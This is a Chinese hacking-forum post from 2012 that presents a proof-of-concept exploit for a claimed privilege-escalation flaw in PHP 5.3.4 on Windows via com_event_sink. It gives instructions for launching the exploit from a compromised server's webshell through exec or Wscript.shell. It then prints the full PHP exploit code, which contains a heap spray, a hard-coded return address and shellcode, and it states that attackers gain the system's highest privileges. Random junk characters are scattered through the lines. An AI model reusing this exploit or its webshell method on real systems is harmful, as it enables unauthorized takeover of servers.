找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 2106|回复: 0
打印 上一主题 下一主题

PHP 5.3.4(WIN) COM_SINK权限提升漏洞

[复制链接]
跳转到指定楼层
楼主
发表于 2012-11-9 21:08:13 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
PHP最新版已经更新至5.4.x,不过中国大陆尚处于在5.2.x和5.3.x更替的阶段。存在漏洞的php存在于5.3.x版本中4 d: J  M; O- F! l5 }" m

5 |( v5 Q3 _; V) j  N& W1 C; Z测试方法如下:cmd /c x:\php\php.exe x:\test.php$ y' R: w' X: u1 A. F$ b* q$ R: w
7 E. b' R+ x, e$ g
下载php程序至本地,然后使用php.exe解析php即可。Webshell上面使用php的exec等函数执行,或者使用Wscript.shell调用cmd.exe然后 /c x:\php\php.exe x:\xxxx\test.php
; W6 D4 T' f% G; _! K+ y! i这里是两个测试的截图:
6 m& E" J" j# A" {5 h) E% P" [
4 y9 a! Z% Z2 I, T& ~& ~7 k) M
3 n! |- g! x" {  V* U: v! p; j/ C; A

! T% L# J0 Y" ?; S, H
6 K% [( Q( t6 M" v成功利用此漏洞的攻击者将获得系统的最高权限9 J$ X: n0 q$ }+ Y

, K% F1 V5 w9 D* v$ s3 E& F  _" P
4 Z2 W9 c& `. V
1 W7 n! V2 D; R& R' H4 U' S5 [; [* m+ v2 H" J4 u( O
* {7 o" ?# E9 I/ k$ U  {6 @
关于漏洞分析稍后附上。一下是PoC代码:2 G" N) r# }$ L9 J

4 |$ M+ \/ @# [! o8 D' i<?php
# s% I/ ]8 [7 w; p0 ^//PHP 5.3.4(Win版) com_event_sink()模型权限提升漏洞4 M8 \. l0 G3 M) P8 n( A
//$eip ="\x44\x43\x42\x41";& l# o, ^, w2 J( I0 E  p
$eip= "\x4b\xe8\x57\x78";
* F: i  W' f0 w! E. w$eax ="\x80\x01\x8d\x04";
1 h; W3 O6 x* B, d$ O$deodrant="";
; i3 \: B( h! E; C" m2 J& b/ |$axespray = str_repeat($eip.$eax,0x80);# {. p8 k9 o% w, f
//048d0190; v: p( D* s; a0 {6 E, A' y) w
echo strlen($axespray);4 y# w% Y  N+ f5 `/ d  g2 r! q# i. O
echo "PHP 5.3.4(WIN) COM_SINK Privilege Escalation\n";% p- {+ ~2 H) L& `- A0 X: q
echo "Silic Group Hacker Army - BlackBap.Org";9 ?8 ?: \" q( K3 }3 M- u+ n
//19200 ==4B32 4b00# ?, v6 z/ u+ u! y* F# p: D5 Y, ~# |
for($axeeffect=0;$axeeffect<0x4B32;$axeeffect++){$deodrant.=$axespray;}
/ m' m4 B9 }" q+ c$terminate = "T";% N. m7 I7 ~" u6 ^+ O! u) U
$u[] =$deodrant;3 t( Z0 |" O/ k! P2 w* r
$r[] =$deodrant.$terminate;0 t2 y, H- w( X3 r% n4 N% d
$a[] =$deodrant.$terminate;
3 V$ o4 `  f# Q- S" [4 j/ V1 S# G$s[] =$deodrant.$terminate;3 D$ r2 t, k* {& }
//$vVar = new VARIANT(0x048d0038+$offset);        这里是可控可改的8 u5 T. _& O  c  ^4 U" t$ e+ o
$vVar = new VARIANT(0x048d0000+180);3 l1 c; N4 e( ]' v/ v/ ~# z& z
//弹窗代码(Shellcode)' T2 x0 K) `2 C: J
$buffer = "\x90\x90\x90"."\xB9\x38\xDD\x82\x7C\x33\xC0\xBB"."\xD8\x0A\x86\x7C\x51\x50\xFF\xd3";
3 \& m' I- K' o. n* k8 C6 i$var2 = new VARIANT(0x41414242);
0 @1 D! j* b; j4 p; V- J, a* ]/ b# ecom_event_sink($vVar,$var2,$buffer);
4 {( E5 p/ s# E9 h( S?>
& J, @) M1 J: I' K: J3 ^! V

本帖子中包含更多资源

您需要 登录 才可以下载或查看,没有帐号?立即注册

x
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表